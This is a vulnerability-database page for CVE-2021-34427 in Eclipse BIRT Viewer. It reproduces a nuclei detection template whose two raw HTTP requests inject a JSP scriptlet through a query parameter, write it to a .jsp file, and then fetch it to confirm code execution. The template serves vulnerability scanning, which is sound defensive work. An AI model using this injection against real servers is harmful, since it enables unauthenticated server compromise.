Lucene search
K

Eclipse BIRT Viewer - Remote Code Execution

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

Eclipse BIRT Viewer versions 4.8.0 and earlier allow remote code execution via JSP injection from query parameters.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Eclipse Business Intelligence Reporting Tool 4.11.0 Remote Code Execution Vulnerability
24 Dec 202200:00
zdt
GithubExploit
Exploit for Unrestricted Upload of File with Dangerous Type in Eclipse Business_Intelligence_And_Reporting_Tools
17 Jun 202623:48
githubexploit
ATTACKERKB
CVE-2021-34427
25 Jun 202119:15
attackerkb
Circl
CVE-2021-34427
17 Nov 202519:45
circl
CNNVD
Eclipse BIRT 代码问题漏洞
25 Jun 202100:00
cnnvd
CVE
CVE-2021-34427
25 Jun 202100:00
cve
Cvelist
CVE-2021-34427
25 Jun 202100:00
cvelist
EUVD
EUVD-2021-21085
7 Oct 202500:30
euvd
NVD
CVE-2021-34427
25 Jun 202119:15
nvd
Packet Storm
Eclipse Business Intelligence Reporting Tool 4.11.0 Remote Code Execution
22 Dec 202200:00
packetstorm
Rows per page
id: CVE-2021-34427

info:
  name: Eclipse BIRT Viewer - Remote Code Execution
  author: us3r777,Synacktiv
  severity: critical
  description: |
    Eclipse BIRT versions 4.8.0 and earlier contain a JSP injection caused by query parameters, letting remote attackers create and access malicious JSP files in the viewer directory, exploit requires sending crafted query parameters.
  impact: |
    Unauthenticated attackers can create and access malicious JSP files via JSP injection, achieving remote code execution and complete server compromise.
  remediation: |
    Upgrade to Eclipse BIRT version 4.9.0 or later.
  reference:
    - https://bugs.eclipse.org/bugs/show_bug.cgi?id=538142
    - https://sec-consult.com/vulnerability-lab/advisory/remote-code-execution-bypass-eclipse-business-intelligence-reporting-birt/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-34427
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-34427
    epss-score: 0.5771
    epss-percentile: 0.98967
    cwe-id: CWE-434
    cpe: cpe:2.3:a:eclipse:business_intelligence_and_reporting_tools:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: vendor
    product: business_intelligence_and_reporting_tools
    shodan-query: 'http.title:"eclipse birt home"'
  tags: cve,cve2021,birt,rce,file-upload,intrusive,vuln,vkev

variables:
  filename: "{{rand_base(20)}}"
  fingerprint: "{{rand_base(20)}}"
  payload: "<%out.println(\"{{fingerprint}}\");%>"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /document?__report=test.rptdesign&sample={{url_encode(payload)}}&__document=./test/{{filename}}.jsp/. HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /test/{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body_1, "The report document file has been generated successfully.")'
          - 'contains(body_2, "{{fingerprint}}")'
          - 'contains(header_2, "text/html")'
        condition: and
# digest: 4b0a00483046022100fbcd90c6c8e50bb9fe035537626ac643b823a8d2ff62e810434e2696a89e7b7d022100ca3896c450acc7b5a200ce37a446360445b6f336d4c8ad5ee8e56b8b46408495:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
CVSS 3.19.8
EPSS0.5771
21